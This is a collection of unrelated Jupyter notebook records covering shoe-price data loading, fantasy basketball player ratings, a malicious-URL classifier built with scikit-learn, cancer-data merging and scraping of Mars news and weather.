"#drive.mount('/content/drive')",
"_____no_output_____"
],
[
"cd 'drive/My Drive/Colab Notebooks/dw_matrix'",
"/content/drive/My Drive/Colab Notebooks/dw_matrix\n"
],
[
"ls matrix_one",
"day3.ipynb\n"
],
[
"!mkdir data",
"_____no_output_____"
],
[
"!echo 'data' >.gitignore",
"_____no_output_____"
],
[
"!git add .gitignore",
"_____no_output_____"
],
[
"data = dw.load_dataset('datafiniti/mens-shoe-prices')",
"_____no_output_____"
],
[
"data.dataframes",
"_____no_output_____"
],
[
"df = data.dataframes['7004_1']",
"/usr/local/lib/python3.6/dist-packages/datadotworld/models/dataset.py:209: UserWarning: Unable to set data frame dtypes automatically using 7004_1 schema. Data types may need to be adjusted manually. Error: Integer column has NA values in column 10\n 'Error: {}'.format(resource_name, e))\n/usr/local/lib/python3.6/dist-packages/datadotworld/util.py:121: DtypeWarning: Columns (39,45) have mixed types. Specify dtype option on import or set low_memory=False.\n return self._loader_func()\n"
],
[
"df.head()",
"_____no_output_____"
],
[
"df.columns",
"_____no_output_____"
],
[
"df.prices_currency.unique()",
"_____no_output_____"
],
[
"df.prices_currency.value_counts()",
"_____no_output_____"
],
[
"df_usd = df[df.prices_currency == 'USD'].copy()",
"_____no_output_____"
],
[
"df_usd['prices_amountmin'] = df_usd.prices_amountmin.astype(np.float)",
"_____no_output_____"
],
[
"filter_max = np.percentile(df_usd.prices_amountmin, 99)\nfilter_max",
"_____no_output_____"
],
[
"df_usd_filter = df_usd[df_usd['prices_amountmin'] < filter_max]",
"_____no_output_____"
],
[
"df_usd_filter.prices_amountmin.hist(bins=50);",
"_____no_output_____"
],
[
"ls",
"\u001b[0m\u001b[01;34mdata\u001b[0m/ HelloGithub.ipynb LICENSE \u001b[01;34mmatrix_one\u001b[0m/ README.md\n"
],
[
"df.to_csv('data/Mens_Shoe_Prices.csv', index=False)",
"_____no_output_____"
],
[
"!git add matrix_one/day3.ipynb",
"day3.ipynb\n"
],
[
"",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb00f7c3cd08b4455d6ab93478b0106958ffd82d | 294,508 | ipynb | Jupyter Notebook | 03_deep-learning/03_loss_function.ipynb | amenoyoya/julia_ml-tuto | 9c0be0923ea00ca4d1d51c0c6f61f6f2748232be | [
"MIT"
] | null | null | null | 03_deep-learning/03_loss_function.ipynb | amenoyoya/julia_ml-tuto | 9c0be0923ea00ca4d1d51c0c6f61f6f2748232be | [
"MIT"
] | null | null | null | 03_deep-learning/03_loss_function.ipynb | amenoyoya/julia_ml-tuto | 9c0be0923ea00ca4d1d51c0c6f61f6f2748232be | [
"MIT"
] | null | null | null | 230.084375 | 160,682 | 0.8534 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
cb00faf465b00cc7c73a7034aef537601237e9e8 | 504,186 | ipynb | Jupyter Notebook | analysis/notebooks/strategy_analysis.ipynb | kangliu47/espn-api | 0539dd9863edf27d839dac8d028df25e187c5c6d | [
"MIT"
] | null | null | null | analysis/notebooks/strategy_analysis.ipynb | kangliu47/espn-api | 0539dd9863edf27d839dac8d028df25e187c5c6d | [
"MIT"
] | null | null | null | analysis/notebooks/strategy_analysis.ipynb | kangliu47/espn-api | 0539dd9863edf27d839dac8d028df25e187c5c6d | [
"MIT"
] | null | null | null | 580.191024 | 312,767 | 0.761749 | [
[
[
"import sys\nimport os\n\nproject_root = os.path.abspath(\"../..\")\n# project_root = os.path.abspath(os.path.join(script_path, \"../..\"))\nif project_root not in sys.path:\n sys.path.append(project_root)\n print(f\"Project_root: {project_root}\")\n\n\nimport pandas as pd\nfrom analysis.utils.constants import stats_2021_path, projected_2022_path\n\nprojected_stats = pd.read_csv(projected_2022_path).dropna()\nlast_year_stats = pd.read_csv(stats_2021_path).dropna()\ndata_set = {\"last_year\": last_year_stats, \"projected\": projected_stats}\n\nfrom analysis.player_rating import (\n get_players_pool,\n get_player_ratings,\n combine_player_data,\n get_expected_salary,\n)\n\nn_teams = 13\nplayers_pool = get_players_pool(n_teams=n_teams, n_players=17, over_write=1100)\nrating_projected = get_player_ratings(projected_stats, players_pool=players_pool)\nrating_last_year = get_player_ratings(last_year_stats, players_pool=players_pool)\nplayer_ratings = combine_player_data(\n data_last_year=rating_last_year, data_projected=rating_projected\n)\nplayer_stats = combine_player_data(\n data_last_year=last_year_stats.set_index(\"name\"),\n data_projected=projected_stats.set_index(\"name\"),\n)\n\nfor n_expensive in range(5, 14, 2):\n player_ratings[f\"salary_{n_expensive}\"] = get_expected_salary(\n player_ratings,\n players_per_team=13,\n n_teams=n_teams,\n one_dollar_rank=13 * n_expensive,\n ).round(2)\n",
"Project_root: /Users/kangliu/my_projects/espn-api\n"
]
],
[
[
"## Stats Scarcity Plot",
"_____no_output_____"
]
],
[
[
"import holoviews as hv\nimport hvplot.pandas\nfrom analysis.utils.constants import stats_counts\n\nrating_cols = [\"overall\"]\nsummary_data = (\n pd.concat([player_stats[stats_counts], player_ratings[rating_cols]], axis=1)\n .sort_values(by=\"overall\", ascending=False)\n .round(2)\n .reset_index()\n)\nsummary_data[\"rank\"] = summary_data.index + 1\n\n\ndef get_reverse_cumsum_fraction(col_data):\n this_total = col_data.sum()\n this_resverse_cumsum = this_total - col_data.cumsum()\n return this_resverse_cumsum / this_total\n\n\ndecay_lines = {}\n\nfor col in [\"PTS\", \"AST\", \"REB\", \"3PTM\", \"BLK\", \"STL\"]:\n summary_data[f\"cf_{col}\"] = get_reverse_cumsum_fraction(summary_data[col])\n this_line = summary_data.hvplot.line(x=\"rank\", y=f\"cf_{col}\", label=col)\n decay_lines[col] = this_line\n\nimport holoviews as hv\n\nhv.Overlay(list(decay_lines.values())).opts(\n xlabel=\"Rank\",\n ylabel=\"Fraction\",\n title=\"Stats Scarcity\",\n width=800,\n height=500,\n xlim=(0, 13 * 13),\n ylim=(0.4, 1),\n legend_position=\"bottom_left\",\n)\n\n",
"_____no_output_____"
]
],
[
[
"## Component Scatter",
"_____no_output_____"
]
],
[
[
"x_cols = [\"AST\", \"FTR\"]\ny_cols = [\"BLK\", \"FGR\"]\nsalary_threshold = 35\n\nplot_data = player_ratings.copy().reset_index()\nplot_data[\"x_data\"] = plot_data[x_cols].sum(axis=1)\nplot_data[\"y_data\"] = plot_data[y_cols].sum(axis=1)\nplot_data[\"strategy_focus\"] = plot_data[x_cols + y_cols].sum(axis=1)\n\nfrom analysis.visualization import plot_player_ratings_scatter\n\nstrategy_scatter = plot_player_ratings_scatter(\n player_ratings=plot_data,\n x_col=\"x_data\",\n y_col=\"y_data\",\n color_col=\"strategy_focus\",\n width=600,\n height=400,\n xlabel=\" + \".join(x_cols),\n ylabel=\" + \".join(y_cols),\n)\n\npositive_x = plot_data[\"x_data\"] > 0\npositive_y = plot_data[\"y_data\"] > 0\n\n\nplot_data[\"wasted_value\"] = plot_data[\"overall\"] - plot_data[\"strategy_focus\"]\ntarget_scatter = plot_player_ratings_scatter(\n player_ratings=plot_data,\n x_col=\"overall\",\n y_col=\"wasted_value\",\n width=600,\n height=400,\n)\nwasted_value = plot_data[\"wasted_value\"] > 0\nnot_too_expensive = plot_data[\"salary_13\"] < salary_threshold\nsorted_target = plot_data[wasted_value & not_too_expensive].sort_values(\n by=\"overall\", ascending=False\n)\n\n(strategy_scatter + target_scatter).cols(1)\n",
"_____no_output_____"
],
[
"sleeper_list = [\n \"Cade Cunningham\",\n \"Jalen Suggs\",\n \"Evan Mobley\",\n \"Killian Hayes\",\n \"Scottie Barnes\",\n \"Jordan Poole\",\n]\n\ninjured_list = [\n \"Kawhi Leonard\",\n \"Jonanthan Issac\",\n \"Klay Thompson\",\n]\n\nguard_list = [\n \"Trae Young\",\n \"De'Aaron Fox\",\n \"Jrue Holiday\",\n \"Zach LaVine\",\n \"Shai Gilgeous-Alexander\",\n \"DeMar DeRozan\",\n \"Lonzo Ball\",\n \"Marcus Smart\",\n \"Tyrese Haliburton\",\n \"T.J. McConnell\",\n]\n\nforward_list = [\n \"Domantas Sabonis\",\n \"Brandon Ingram\",\n \"Tobias Harris\",\n \"Joe Harris\",\n \"Duncan Robinson\",\n]\n\ncenter_list = [\n \"Rudy Gobert\",\n \"Deandre Ayton\",\n \"Draymond Green\",\n \"Bam Adebayo\",\n \"Isaiah Stewart\",\n \"Jonas Valanciunas\",\n \"Jakob Poeltl\",\n \"Jarrett Allen\",\n \"Robert Williams III\",\n \"Nerlens Noel\",\n \"Mo Bamba\",\n]\n\ntarget_list = guard_list + center_list + forward_list + sleeper_list\ndraft_targets = plot_data[plot_data[\"name\"].isin(target_list)]\n\nassert (set(target_list) - set(draft_targets[\"name\"])) == set()\nprint(draft_targets.shape[0])\n",
"31\n"
],
[
"# plot_data.sort_values(by=\"AST\", ascending=False).head(10)\n# plot_data[plot_data.name.str.contains(\"Smart\")]\ndraft_targets[[\"name\", \"overall\", \"strategy_focus\", \"salary_5\", \"salary_13\"]]\n",
"_____no_output_____"
]
],
[
[
"## Target Players",
"_____no_output_____"
],
[
"## Salary Projection Plot",
"_____no_output_____"
]
],
[
[
"player_ratings.stats_type.value_counts()",
"_____no_output_____"
],
[
"plot_data = player_ratings.reset_index().copy()\nplot_data[\"rank\"] = plot_data.index + 1\n\noverall_scatter = plot_data.hvplot.scatter(\n x=\"rank\", y=\"overall\", c=\"overall\", s=50, hover_cols=[\"name\", \"overall\"],\n)\noverall_line = plot_data.hvplot.line(\n x=\"rank\", y=\"overall\", hover_cols=[\"name\", \"overall\"]\n)\noverall_plot = overall_line * overall_scatter\n\nsalary_lines = {}\n\nfor n_expensive in range(5, 14, 2):\n this_scatter = plot_data.hvplot.scatter(\n x=\"rank\", y=f\"salary_{n_expensive}\", hover_cols=[\"name\", \"overall\"]\n )\n this_line = plot_data.hvplot.line(\n x=\"rank\", y=f\"salary_{n_expensive}\", hover_cols=[\"name\", \"overall\"]\n )\n salary_lines[n_expensive] = this_scatter * this_line\n\noverall_plot.opts(height=600) + hv.Overlay(list(salary_lines.values())).opts(height=600)\n",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
]
] |
cb010bec9813f11e7db8f4c43391716f7efbe35c | 292,149 | ipynb | Jupyter Notebook | Malicious URL identifier/malicious-url-detection.ipynb | aayushkumar20/Kaggle-datasets-based-models | df6f3ed5e3f50aa1e8005573551c5d67f0c4229d | [
"MIT"
] | 1 | 2022-01-29T18:05:48.000Z | 2022-01-29T18:05:48.000Z | Malicious URL identifier/malicious-url-detection.ipynb | aayushkumar20/Kaggle-datasets-based-models | df6f3ed5e3f50aa1e8005573551c5d67f0c4229d | [
"MIT"
] | null | null | null | Malicious URL identifier/malicious-url-detection.ipynb | aayushkumar20/Kaggle-datasets-based-models | df6f3ed5e3f50aa1e8005573551c5d67f0c4229d | [
"MIT"
] | null | null | null | 134.879501 | 36,124 | 0.854235 | [
[
[
"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the read-only \"../input/\" directory\n# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory\n\nimport os\nfor dirname, _, filenames in os.walk('/kaggle/input'):\n for filename in filenames:\n print(os.path.join(dirname, filename))\n\n# You can write up to 20GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using \"Save & Run All\" \n# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session",
"/kaggle/input/malicious-urls-dataset/malicious_phish.csv\n"
]
],
[
[
"# Installing important modules for proper functioning. #",
"_____no_output_____"
]
],
[
[
"!pip install tld",
"Collecting tld\r\n Downloading tld-0.12.6-py37-none-any.whl (412 kB)\r\n |████████████████████████████████| 412 kB 601 kB/s \r\n\u001b[?25hInstalling collected packages: tld\r\nSuccessfully installed tld-0.12.6\r\n\u001b[33mWARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv\u001b[0m\r\n"
]
],
[
[
"# Importing all required modules #",
"_____no_output_____"
]
],
[
[
"import re\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom colorama import Fore\nfrom urllib.parse import urlparse\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, classification_report, accuracy_score\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier, ExtraTreesClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom tld import get_tld, is_tld\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.metrics import plot_roc_curve",
"_____no_output_____"
]
],
[
[
"# Reading the contents from the imported (csv) file provided by the Kaggle #",
"_____no_output_____"
]
],
[
[
"data = pd.read_csv('/kaggle/input/malicious-urls-dataset/malicious_phish.csv')\ndata.head()",
"_____no_output_____"
],
[
"data.isnull().sum()",
"_____no_output_____"
],
[
"count = data.type.value_counts()\ncount",
"_____no_output_____"
]
],
[
[
"# Checking data types #",
"_____no_output_____"
],
[
"## Counting the numbers of phising, malware, etc types of links from the given csv files ##",
"_____no_output_____"
]
],
[
[
"sns.barplot(x=count.index, y=count)\nplt.xlabel('Types of links')\nplt.ylabel('Counts');",
"_____no_output_____"
]
],
[
[
"# Representing the types of links based on their categories and types #",
"_____no_output_____"
],
[
"## removing 'www\" from the given dataset ##",
"_____no_output_____"
]
],
[
[
"data['url'] = data['url'].replace('www.', '', regex=True)\ndata",
"_____no_output_____"
]
],
[
[
"### Removing (WWW) from the given list and allowing only http:// ###",
"_____no_output_____"
]
],
[
[
"rem = {\"Category\": {\"benign\": 0, \"defacement\": 1, \"phishing\":2, \"malware\":3}}\ndata['Category'] = data['type']\ndata = data.replace(rem)",
"_____no_output_____"
],
[
"data['url_len'] = data['url'].apply(lambda x: len(str(x)))",
"_____no_output_____"
],
[
"def process_tld(url):\n try:\n res = get_tld(url, as_object = True, fail_silently=False,fix_protocol=True)\n pri_domain= res.parsed_url.netloc\n except :\n pri_domain= None\n return pri_domain",
"_____no_output_____"
],
[
"data['domain'] = data['url'].apply(lambda i: process_tld(i))",
"_____no_output_____"
],
[
"data.head()",
"_____no_output_____"
]
],
[
[
"# 👇 extracting number of feature = ['@','?','-','=','.','#','%','+','$','!','*',',','//'] from given data set. #",
"_____no_output_____"
]
],
[
[
"feature = ['@','?','-','=','.','#','%','+','$','!','*',',','//']\nfor a in feature:\n data[a] = data['url'].apply(lambda i: i.count(a))",
"_____no_output_____"
],
[
"def abnormal_url(url):\n hostname = urlparse(url).hostname\n hostname = str(hostname)\n match = re.search(hostname, url)\n if match:\n return 1\n else:\n return 0",
"_____no_output_____"
],
[
"data['abnormal_url'] = data['url'].apply(lambda i: abnormal_url(i))",
"_____no_output_____"
],
[
"sns.countplot(x='abnormal_url', data=data);",
"_____no_output_____"
],
[
"def httpSecure(url):\n htp = urlparse(url).scheme\n match = str(htp)\n if match=='https':\n return 1\n else:\n return 0",
"_____no_output_____"
],
[
"data['https'] = data['url'].apply(lambda i: httpSecure(i))",
"_____no_output_____"
],
[
"sns.countplot(x='https', data=data);",
"_____no_output_____"
]
],
[
[
"# Training the model for realtime use #",
"_____no_output_____"
]
],
[
[
"def digit_count(url):\n digits = 0\n for i in url:\n if i.isnumeric():\n digits = digits + 1\n return digits",
"_____no_output_____"
],
[
"data['digits']= data['url'].apply(lambda i: digit_count(i))",
"_____no_output_____"
],
[
"def letter_count(url):\n letters = 0\n for i in url:\n if i.isalpha():\n letters = letters + 1\n return letters",
"_____no_output_____"
],
[
"data['letters']= data['url'].apply(lambda i: letter_count(i))",
"_____no_output_____"
],
[
"data.head()",
"_____no_output_____"
],
[
"def Shortining_Service(url):\n match = re.search('bit\\.ly|goo\\.gl|shorte\\.st|go2l\\.ink|x\\.co|ow\\.ly|t\\.co|tinyurl|tr\\.im|is\\.gd|cli\\.gs|'\n 'yfrog\\.com|migre\\.me|ff\\.im|tiny\\.cc|url4\\.eu|twit\\.ac|su\\.pr|twurl\\.nl|snipurl\\.com|'\n 'short\\.to|BudURL\\.com|ping\\.fm|post\\.ly|Just\\.as|bkite\\.com|snipr\\.com|fic\\.kr|loopt\\.us|'\n 'doiop\\.com|short\\.ie|kl\\.am|wp\\.me|rubyurl\\.com|om\\.ly|to\\.ly|bit\\.do|t\\.co|lnkd\\.in|'\n 'db\\.tt|qr\\.ae|adf\\.ly|goo\\.gl|bitly\\.com|cur\\.lv|tinyurl\\.com|ow\\.ly|bit\\.ly|ity\\.im|'\n 'q\\.gs|is\\.gd|po\\.st|bc\\.vc|twitthis\\.com|u\\.to|j\\.mp|buzurl\\.com|cutt\\.us|u\\.bb|yourls\\.org|'\n 'x\\.co|prettylinkpro\\.com|scrnch\\.me|filoops\\.info|vzturl\\.com|qr\\.net|1url\\.com|tweez\\.me|v\\.gd|'\n 'tr\\.im|link\\.zip\\.net',\n url)\n if match:\n return 1\n else:\n return 0",
"_____no_output_____"
],
[
"data['Shortining_Service'] = data['url'].apply(lambda x: Shortining_Service(x))",
"_____no_output_____"
],
[
"sns.countplot(x='Shortining_Service', data=data);",
"_____no_output_____"
],
[
"def having_ip_address(url):\n match = re.search(\n '(([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\.([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\.([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\.'\n '([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\/)|' # IPv4\n '(([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\.([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\.([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\.'\n '([01]?\\\\d\\\\d?|2[0-4]\\\\d|25[0-5])\\\\/)|' # IPv4 with port\n '((0x[0-9a-fA-F]{1,2})\\\\.(0x[0-9a-fA-F]{1,2})\\\\.(0x[0-9a-fA-F]{1,2})\\\\.(0x[0-9a-fA-F]{1,2})\\\\/)' # IPv4 in hexadecimal\n '(?:[a-fA-F0-9]{1,4}:){7}[a-fA-F0-9]{1,4}|'\n '([0-9]+(?:\\.[0-9]+){3}:[0-9]+)|'\n '((?:(?:\\d|[01]?\\d\\d|2[0-4]\\d|25[0-5])\\.){3}(?:25[0-5]|2[0-4]\\d|[01]?\\d\\d|\\d)(?:\\/\\d{1,2})?)', url) # Ipv6\n if match:\n return 1\n else:\n return 0",
"_____no_output_____"
],
[
"data['having_ip_address'] = data['url'].apply(lambda i: having_ip_address(i))",
"_____no_output_____"
],
[
"data[\"having_ip_address\"].value_counts()",
"_____no_output_____"
],
[
"plt.figure(figsize=(15, 15))\nsns.heatmap(data.corr(), linewidths=.5)",
"_____no_output_____"
],
[
"X = data.drop(['url','type','Category','domain'],axis=1)\ny = data['Category']",
"_____no_output_____"
],
[
"X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=2)",
"_____no_output_____"
],
[
"models = [DecisionTreeClassifier,RandomForestClassifier,AdaBoostClassifier,KNeighborsClassifier,SGDClassifier,\n ExtraTreesClassifier,GaussianNB]\naccuracy_test=[]\nfor m in models:\n print('Model =>\\033[07m {} \\033[0m'.format(m))\n model_ = m()\n model_.fit(X_train, y_train)\n pred = model_.predict(X_test)\n acc = accuracy_score(pred, y_test)\n accuracy_test.append(acc)\n print('Test Accuracy :\\033[32m \\033[01m {:.2f}% \\033[30m \\033[0m'.format(acc*100))\n print('\\033[01m Classification_report \\033[0m')\n print(classification_report(y_test, pred))\n print('\\033[01m Confusion_matrix \\033[0m')\n cf_matrix = confusion_matrix(y_test, pred)\n plot_ = sns.heatmap(cf_matrix/np.sum(cf_matrix), annot=True,fmt= '0.2%')\n plt.show()\n print('\\033[31m End \\033[0m')",
"Model =>\u001b[07m <class 'sklearn.tree._classes.DecisionTreeClassifier'> \u001b[0m\nTest Accuracy :\u001b[32m \u001b[01m 90.93% \u001b[30m \u001b[0m\n\u001b[01m Classification_report \u001b[0m\n precision recall f1-score support\n\n 0 0.92 0.97 0.94 85565\n 1 0.93 0.96 0.94 19319\n 2 0.80 0.57 0.66 18805\n 3 0.94 0.91 0.93 6550\n\n accuracy 0.91 130239\n macro avg 0.90 0.85 0.87 130239\nweighted avg 0.90 0.91 0.90 130239\n\n\u001b[01m Confusion_matrix \u001b[0m\n"
],
[
"output = pd.DataFrame({\"Model\":['Decision Tree Classifier','Random Forest Classifier',\n 'AdaBoost Classifier','KNeighbors Classifier','SGD Classifier',\n 'Extra Trees Classifier','Gaussian NB'],\n \"Accuracy\":accuracy_test})\n",
"_____no_output_____"
],
[
"plt.figure(figsize=(10, 5))\nplots = sns.barplot(x='Model', y='Accuracy', data=output)\nfor bar in plots.patches:\n plots.annotate(format(bar.get_height(), '.2f'),\n (bar.get_x() + bar.get_width() / 2,\n bar.get_height()), ha='center', va='center',\n size=15, xytext=(0, 8),\n textcoords='offset points')\n\nplt.xlabel(\"Models\", size=14)\nplt.xticks(rotation=20);\nplt.ylabel(\"Accuracy\", size=14)\nplt.show()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb011699e9d633430c55324a42fe0124e44cf946 | 4,589 | ipynb | Jupyter Notebook | Merge_Cancer.ipynb | NCBI-Codeathons/NOVEL-CLINICAL-PREDICTION-APPROACHES-TO-MANAGING-CARE-FOR-ACUTE-PULMONARY-EMBOLISM-PATIENTS | 4d8f5db3ab026c146620b479649f0122b5e776be | [
"MIT"
] | 1 | 2019-11-13T09:10:36.000Z | 2019-11-13T09:10:36.000Z | Merge_Cancer.ipynb | NCBI-Codeathons/NOVEL-CLINICAL-PREDICTION-APPROACHES-TO-MANAGING-CARE-FOR-ACUTE-PULMONARY-EMBOLISM-PATIENTS | 4d8f5db3ab026c146620b479649f0122b5e776be | [
"MIT"
] | null | null | null | Merge_Cancer.ipynb | NCBI-Codeathons/NOVEL-CLINICAL-PREDICTION-APPROACHES-TO-MANAGING-CARE-FOR-ACUTE-PULMONARY-EMBOLISM-PATIENTS | 4d8f5db3ab026c146620b479649f0122b5e776be | [
"MIT"
] | 1 | 2019-11-13T09:10:37.000Z | 2019-11-13T09:10:37.000Z | 28.503106 | 149 | 0.568533 | [
[
[
"import pandas as pd\nimport numpy as np",
"_____no_output_____"
],
[
"#Paths to files\nencounter_path = \"C:\\\\Users\\\\winsk\\\\Desktop\\\\UTSW Data\\\\df_encounter.csv\"\ncancer_path = \"C:\\\\Users\\\\winsk\\\\Desktop\\\\UTSW Data\\\\df_cancer.csv\"",
"_____no_output_____"
],
[
"#Read in dataframes\nencounter_df = pd.read_csv(encounter_path)\ncancer_df = pd.read_csv(cancer_path)",
"_____no_output_____"
],
[
"#function to merge cancer data\ndef merge_cancer(enc_df, cnc_df):\n #Make modifications to cancer df\n mod_cancer_df = cnc_df.copy()\n mod_cancer_df.set_index(\"HSP_ENC\", inplace = True)\n mod_cancer_df.reset_index(level=0, inplace=True)\n mod_cancer_df.loc[mod_cancer_df.cancer_at_enc == 'Unknown, Missing Remission Date', 'cancer_at_enc'] = 'Unknown'\n mod_cancer_df.loc[mod_cancer_df.cancer_at_enc == 'Unknown, Previously Positive', 'cancer_at_enc'] = 'Unknown'\n mod_cancer_df.loc[mod_cancer_df.cancer_at_enc == 'Unknown, Not Documented', 'cancer_at_enc'] = 'Unknown'\n mod_cancer_df.loc[mod_cancer_df.cancer_at_enc == 'Unknown, Not documented', 'cancer_at_enc'] = 'Unknown'\n mod_cancer_df.loc[mod_cancer_df.cancer_at_enc == 'No Cancer', 'cancer_at_enc'] = '1'\n mod_cancer_df.loc[mod_cancer_df.cancer_at_enc == 'Unknown', 'cancer_at_enc'] = '2'\n mod_cancer_df.loc[mod_cancer_df.cancer_at_enc == 'Cancer', 'cancer_at_enc'] = '3'\n mod_cancer_df['cancer_at_enc'] = mod_cancer_df['cancer_at_enc'].astype(int)\n mod_cancer_df.drop_duplicates(['PATIENT_ID', 'HSP_ENC'])\n \n #Take only cancer status column with max value\n drop_cancer_df = mod_cancer_df[['HSP_ENC', 'cancer_at_enc']]\n drop_cancer_df = drop_cancer_df.groupby('HSP_ENC',group_keys=False).apply(lambda x: x.loc[x['cancer_at_enc']==x['cancer_at_enc'].max()])\n\n #Merge with encounter df and drop dups\n mergeRes = pd.merge(enc_df, drop_cancer_df, on='HSP_ENC', how='left')\n mergeRes = mergeRes.drop_duplicates('HSP_ENC')\n\n #Replace NaN in encounter df with 0 (Never had cancer)\n mergeRes['cancer_at_enc'].fillna(0, inplace=True)\n \n #Renaming the cancer column\n mergeRes.rename(columns={'cancer_at_enc': 'CANCER_RANK'}, inplace=True)\n \n return mergeRes.reset_index(drop=True)",
"_____no_output_____"
],
[
"out = merge_cancer(encounter_df, cancer_df)",
"_____no_output_____"
],
[
"cancer_grp = out.groupby(['CANCER_RANK']).agg('count')\ncancer_grp_count = cancer_grp.sort_values(['HSP_ENC'], ascending=True)\ncancer_grp_count.iloc[:,1]",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb0119dacb32f0f034bc43d06a1911b3a4903f76 | 12,569 | ipynb | Jupyter Notebook | .ipynb_checkpoints/mission_to_mars-checkpoint.ipynb | cgrinstead12/Mission-to-Mars | 9417dc878966bcf38e2fb9bd1ef7c05495d76bf6 | [
"ADSL"
] | null | null | null | .ipynb_checkpoints/mission_to_mars-checkpoint.ipynb | cgrinstead12/Mission-to-Mars | 9417dc878966bcf38e2fb9bd1ef7c05495d76bf6 | [
"ADSL"
] | null | null | null | .ipynb_checkpoints/mission_to_mars-checkpoint.ipynb | cgrinstead12/Mission-to-Mars | 9417dc878966bcf38e2fb9bd1ef7c05495d76bf6 | [
"ADSL"
] | null | null | null | 25.915464 | 550 | 0.506962 | [
[
[
"from splinter import Browser\nfrom bs4 import BeautifulSoup as bs\nimport pymongo\nimport time\nimport pandas as pd",
"_____no_output_____"
],
[
"conn = 'mongodb://localhost:27017'\nclient = pymongo.MongoClient(conn)",
"_____no_output_____"
],
[
"db = client.mars_db\ncollection = db.titles",
"_____no_output_____"
],
[
"executable_path = {\"executable_path\":\"C:/Users/cgrinstead12/Desktop/Mission to Mars/chromedriver.exe\"}\nbrowser = Browser(\"chrome\", **executable_path, headless = False)\nurl = \"https://mars.nasa.gov/news/\"\nbrowser.visit(url)\nhtml = browser.html\nsoup = bs(html,\"html.parser\")",
"_____no_output_____"
],
[
"news_title = soup.find('div', class_='content_title').text\nnews_para = soup.find('div', class_='article_teaser_body').text",
"_____no_output_____"
],
[
"print(news_title)\nprint(news_para)",
"MarCO Makes Space for Small Explorers\nA pair of NASA CubeSats flying to Mars are opening a new frontier for small spacecraft.\n"
],
[
"image_url = \"https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars\"\nbrowser.visit(image_url)",
"_____no_output_____"
],
[
"browser.click_link_by_partial_text('FULL IMAGE')\ntime.sleep(1)\nbrowser.click_link_by_partial_text('more info')",
"_____no_output_____"
],
[
"image_html = browser.html\nsoup = bs(image_html, \"html.parser\")",
"_____no_output_____"
],
[
"image_url = soup.find('img', class_=\"main_image\")['src']",
"_____no_output_____"
],
[
"print(image_url)",
"/spaceimages/images/largesize/PIA18295_hires.jpg\n"
],
[
"main_url = 'https://www.jpl.nasa.gov/'\n\nimage_url_combined = main_url + image_url",
"_____no_output_____"
],
[
"print(image_url_combined)",
"https://www.jpl.nasa.gov//spaceimages/images/largesize/PIA18295_hires.jpg\n"
],
[
"browser.visit(image_url_combined)",
"_____no_output_____"
]
],
[
[
"Step 3 - Twitter Data https://twitter.com/marswxreport?lang=en - Visit the Mars Weather twitter account here and scrape the latest Mars weather tweet from the page. Save the tweet text for the weather report as a variable called mars_weather.",
"_____no_output_____"
]
],
[
[
"url = 'https://twitter.com/marswxreport?lang=en'\nbrowser.visit(url)",
"_____no_output_____"
],
[
"twitter_html = browser.html\nsoup = bs(twitter_html, \"html.parser\")",
"_____no_output_____"
],
[
"mars_weather = soup.find('p', class_=\"TweetTextSize TweetTextSize--normal js-tweet-text tweet-text\").text",
"_____no_output_____"
],
[
"print(mars_weather)",
"Sol 2169 (2018-09-12), high -10C/14F, low -70C/-93F, pressure at 8.82 hPa, daylight 05:41-17:58\n"
]
],
[
[
